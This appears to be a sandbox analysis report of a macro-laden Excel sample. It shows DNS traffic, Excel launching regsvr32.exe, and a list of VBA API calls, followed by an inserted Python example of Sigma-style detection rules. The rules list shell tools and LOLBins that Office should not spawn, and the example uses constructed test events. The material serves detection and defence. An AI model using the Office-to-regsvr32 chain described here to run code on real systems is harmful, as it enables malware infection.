Jan 11, 2021 18:27:59.992686987 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
Jan 11, 2021 18:28:36.852425098 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 11, 2021 18:28:36.900594950 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22 |
Jan 11, 2021 18:28:36.939555883 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 11, 2021 18:28:36.987488985 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22 |
Jan 11, 2021 18:28:38.115564108 CET | 61200 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 11, 2021 18:28:38.163610935 CET | 53 | 61200 | 8.8.8.8 | 192.168.2.22 |
Jan 11, 2021 18:28:38.174900055 CET | 49548 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 11, 2021 18:28:38.225476980 CET | 53 | 49548 | 8.8.8.8 | 192.168.2.22 |
Jan 11, 2021 18:28:38.506975889 CET | 55627 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 11, 2021 18:28:38.555064917 CET | 53 | 55627 | 8.8.8.8 | 192.168.2.22 |
Jan 11, 2021 18:28:38.562401056 CET | 56009 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 11, 2021 18:28:38.610411882 CET | 53 | 56009 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Jan 11, 2021 18:27:59.845685959 CET | 192.168.2.22 | 8.8.8.8 | 0x26d4 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Jan 11, 2021 18:27:59.992686987 CET | 8.8.8.8 | 192.168.2.22 | 0x26d4 | No error (0) | 199.59.242.150 | A (IP address) | IN (0x0001) | ||
Jan 11, 2021 18:28:38.163610935 CET | 8.8.8.8 | 192.168.2.22 | 0xa0c2 | No error (0) | 104.18.10.39 | A (IP address) | IN (0x0001) | ||
Jan 11, 2021 18:28:38.163610935 CET | 8.8.8.8 | 192.168.2.22 | 0xa0c2 | No error (0) | 104.18.11.39 | A (IP address) | IN (0x0001) | ||
Jan 11, 2021 18:28:38.225476980 CET | 8.8.8.8 | 192.168.2.22 | 0x342 | No error (0) | 104.18.11.39 | A (IP address) | IN (0x0001) | ||
Jan 11, 2021 18:28:38.225476980 CET | 8.8.8.8 | 192.168.2.22 | 0x342 | No error (0) | 104.18.10.39 | A (IP address) | IN (0x0001) |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Memory Usage |
---|
High Level Behavior Distribution |
---|
Behavior |
---|
System Behavior |
---|
General |
---|
Start time: | 18:27:41 |
Start date: | 11/01/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f530000 |
File size: | 27641504 bytes |
MD5 hash: | 5FB0A0F93382ECD19F5F499A5CAA59F0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 18:27:48 |
Start date: | 11/01/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xffe30000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 18:28:06 |
Start date: | 11/01/2021 |
Path: | C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f3f0000 |
File size: | 995024 bytes |
MD5 hash: | 45A078B2967E0797360A2D4434C41DB4 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
General |
---|
Start time: | 18:28:06 |
Start date: | 11/01/2021 |
Path: | C:\Windows\System32\DWWIN.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff840000 |
File size: | 152576 bytes |
MD5 hash: | 25247E3C4E7A7A73BAEEA6C0008952B1 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
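The process list above (EXCEL.EXE starting regsvr32.exe, then the DW20/DWWIN crash reporters) is what the two process-level Sigma titles on this page key on. The following is an added example, not the report's output and not the published Sigma rules' exact logic: a small evaluator that applies an approximation of "Office product spawning Windows shell" and "Regsvr32 anomaly" to three constructed process-creation events. The first event mirrors the EXCEL.EXE to regsvr32.exe chain, but its command line and DLL path are invented because the report leaves the Commandline fields empty; the other two are benign controls.

```python
import re
from typing import Callable, Dict, List

# Constructed process-creation events (key=value fields separated by '|').
# Line 1 mirrors the EXCEL.EXE -> regsvr32.exe chain in the System Behavior
# section; its command line and DLL path are invented, since the report leaves
# the Commandline fields empty. Lines 2 and 3 are benign controls.
SAMPLE_EVENTS = r"""
ParentImage=C:\Program Files\Microsoft Office\Office14\EXCEL.EXE|Image=C:\Windows\System32\regsvr32.exe|CommandLine=regsvr32 -s C:\Users\Public\file.dll
ParentImage=C:\Windows\System32\services.exe|Image=C:\Windows\System32\regsvr32.exe|CommandLine=regsvr32 /s C:\Windows\System32\comsvcs.dll
ParentImage=C:\Windows\explorer.exe|Image=C:\Program Files\Microsoft Office\Office14\EXCEL.EXE|CommandLine="EXCEL.EXE" C:\Users\user\Desktop\sample20210111-01.xlsm
""".strip().splitlines()

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe",
               "msaccess.exe", "mspub.exe", "visio.exe"}
# Interpreters and LOLBins an Office process has no business launching.
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                  "mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe"}
# Path fragments that point at user-writable locations (matched lower-cased).
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\", "\\public\\")
# regsvr32's silent switch, written either as -s or /s.
SILENT_FLAG = re.compile(r"(?:^|\s)[/-]s(?:\s|$)", re.IGNORECASE)

Event = Dict[str, str]

def parse_event(line: str) -> Event:
    return dict(field.split("=", 1) for field in line.split("|"))

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def office_product_spawning_shell(ev: Event) -> bool:
    return (basename(ev.get("ParentImage", "")) in OFFICE_APPS
            and basename(ev.get("Image", "")) in SHELL_CHILDREN)

def regsvr32_anomaly(ev: Event) -> bool:
    if basename(ev.get("Image", "")) != "regsvr32.exe":
        return False
    cmd = ev.get("CommandLine", "")
    silent = SILENT_FLAG.search(cmd) is not None
    # The DLL being registered: the last argument that is not a switch.
    operands = [t for t in cmd.split() if not t.startswith(("/", "-"))]
    target = operands[-1].lower() if len(operands) > 1 else ""
    in_user_writable = any(marker in target for marker in USER_WRITABLE)
    return (silent and in_user_writable) or basename(ev.get("ParentImage", "")) in OFFICE_APPS

RULES: Dict[str, Callable[[Event], bool]] = {
    "office_product_spawning_shell": office_product_spawning_shell,
    "regsvr32_anomaly": regsvr32_anomaly,
}

def evaluate(lines: List[str]) -> List[List[str]]:
    """For each event line, the names of the rules it triggers."""
    return [[name for name, rule in RULES.items() if rule(parse_event(line))]
            for line in lines]

if __name__ == "__main__":
    for line, hits in zip(SAMPLE_EVENTS, evaluate(SAMPLE_EVENTS)):
        print(hits or "-", basename(parse_event(line)["Image"]))
```

Only the first event fires, on both rules; the service-started regsvr32 registering a DLL from System32 is deliberately left quiet, because a silent regsvr32 on its own is routine on Windows and the signal comes from the parent process and the DLL's location. In a real deployment the parent-child condition is the more robust of the two: the command line on this page was not even captured, while the EXCEL.EXE to regsvr32.exe edge was.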
Disassembly |
---|
Code Analysis |
---|
Call Graph |
---|
Module: Module1 |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "Module1" |
Executed Functions |
---|
APIs | Meta Information |
---|---|
Cells | |
SpecialCells | |
xlCellTypeConstants | |
value | |
Chr | |
Row | |
Split | |
Split | |
Cells | |
Replace | Replace( |